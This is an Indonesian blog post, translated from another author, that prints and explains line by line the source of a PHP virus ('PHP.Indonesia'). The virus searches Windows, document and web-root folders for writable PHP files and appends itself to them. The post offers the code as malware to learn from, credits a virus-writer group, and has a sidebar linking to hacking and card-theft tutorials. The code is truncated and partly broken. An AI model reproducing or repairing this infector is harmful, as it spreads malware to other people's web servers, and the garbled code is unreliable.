TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » Cara Sederhana membuat Virus PHP

    Cara Sederhana membuat Virus PHP

    Membuat virus bisa dengan bahasa apa saja dan salah satunya adalah dengan bahasa PHP. Pada artikel ini akan kita lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan nama I-Worm.PHP.Indonesia dibuat.

    OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb :
    1. Artikel ini ditujukan buat menambah pengetahuan IT kita saja
    2. Saya dan penulis asli artikel ini (sevenC) tidak bertanggungjawab Jika ada lamer yang bertindak bodoh dengan menyebarkan skrip ini
    3. Judul asli artikel ini adalah "Simple technique how to write PHP virus
    4. Artikel ini sebenarnya buatan sevenC ( http://sevenc.vze.com ) dan saya hanya menterjemahkannya kedalam bahasa indonesia,saya nanti akan mencantumkan kredit kepada sobat saya sevenC,karna
      saya udah buat artikel ini memakai versi indonesia.
    5. Skrip yang saya pake disini juga merupakan skrip virus  "PHP.Indonesia" buatan sevenC dan udah terdeteksi Kaspersky nama "I-Worm.PHP.Indonesia"

    Ok...Kita mulai aja..!!
    Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan coba ngejelasin baris demi baris arti codenya.

    -------------------------------Code-------------------------------
    ");
    $fputs($new, "");
    return;
    }
    }
    closedir($all3);
    // PHP.Indonesia made for all Chicken looser ground the world
    // By sevenC / N0:7
    ?>
    --------------------------------------eoc-----------------------
    Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin
    baris per baris
    code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
    yah...!! :) maklum
    gw belum setaraf sama sevenC,hehehe... :P
    -------------------------------------begin----------------------
    > //
    Jadi baris2 di atas engga akan di eksekusi karna cuman
    komentar.
    $jawa = "indonesia.php\n";
    * Pemberian nama variabel harus dimulai dengan karakter $
    * Menset variabel jawa sama dengan string "indonesia.php" dan \n ntu ganti baris
    * Setiap satu baris kalimat musti diakhiri dengan karakter titik koma --> ; $sumatra = "Wellcome to Indonesian PHPlovers.\n";
    * Menset variabel sumatra sama dengan string "Wellcome to Indonesian PHPlovers" $kalimantan = $jawa . $sumatra;
    * var kalimantan = var gabungan jawa dan var sumatra echo $kalimantan;
    * Menulis variabel kalimantan kedalam texttream $all = opendir('C:\Windows\');
    * var $all = membuka direktory windows

    $all1 = opendir('C:\My Documents\');
    * var $all1 = membuka direktory My Documents

    $all2 = opendir('C:\InetPub\wwwRoot\');
    * var $all2 = membuka directori wwwRoot
    * karna saya rasa maksud sevenC membuka folder ini adalah karna di PWS file-file PHP
    * biasanya diletakan di direktori ini
    $all3 = $all && $all1 && $all2
    * $all3 = gabungan dari $all , $all1 dan $all3
    while ($file = readdir($all3))
    * Perulangan kita mulai ketika kita membaca isi direktori
    {
    * Inget dengan tanda ini..!!
    $inf = true;
    * menSet var $inf sebagai variabel boolean = true
    $exe = false;
    * menSet var $exe sebagai variabel boolean = false
    if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
    ($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
    * Lihatlah extensi2 file yang akan kita serang
    (php,phtml,php3)
    if ( is_file($file) && is_writeable($file) )
    * Mencek atribut2 file,jika kita diijinkan menulis lalu
    {
    * Skali lagi jangan lupa tanda ini
    $new = fopen($file, "r");
    * menSet $new = membuka file baru dengan atribut read only yang hanya bisa dibaca saja
    $look = fread($new, filesize($file));
    * menSet $look = membaca var $new dan ukuran dari file
    $yes = strstr ($look, 'indonesia.php');
    * menSet $yes = $look , indonesia.php

    if (!$yes) $inf = false;
    * Jika bukan var $yes maka var $inf bernilai salah
    }
    if ( ($inf=false) )
    * jika var $inf = salah kemudian
    {
    $new = fopen($file, "a");
    * menSet $new = membuka file ( variabel $file ) / file yang diinfeksi
    $fputs($new, "" kedalam file tsb ($new)
    $fputs($new, "");
    * Tulis "?>" kedalam file tsb
    return;
    * Ulangi langkah-langkah diatas
    }
    }
    closedir($all3);
    * menutup semua direktori yang aktif tadi ($all3)
    // PHP.Indonesia made for all Chicken looser ground the world
    // By sevenC / N0:7
    * komentar om sevenC
    ?>
    * Nutup skrip virus PHP ini

    --------------------------------Selesai---------------------------
    Ok... mudah-mudahan loe semua ngerti apa yang gw tulis diatas,kalo kagak ? bodo amat :P
    Kredit buat :

    1. sevenC (http://trax.to/sevenC) Biarpun umurnya masih belasan tapi gw salut banget sama  otaknya karn Gw udah banyak belajar dari artikelnya.greatz & Thankz man..!!
    2. SECTORS (http://sectors.vze.com Makasih buat semua anak2 sectors baik yang masih aktif maupun tidak di forum teruskan perjuangan kalian, jangan mau bangsa kita ditindas  kebodohan.Bantai semua lamer yang ada di Forum.
    3. IVWA / Indonesian Virus Writer Association  (http://www.geocities.com/ivwa_staff) Kapan neh peluncuran zine pertama ? gw udah gak sabar neh...!!
    4. semua anak2 yang pernah gw temuin di #sectors (woi channel jangan ditinggal molo..!!)

    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    1 komentar:

    Anonim mengatakan...

    fuck u

    Poskan Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger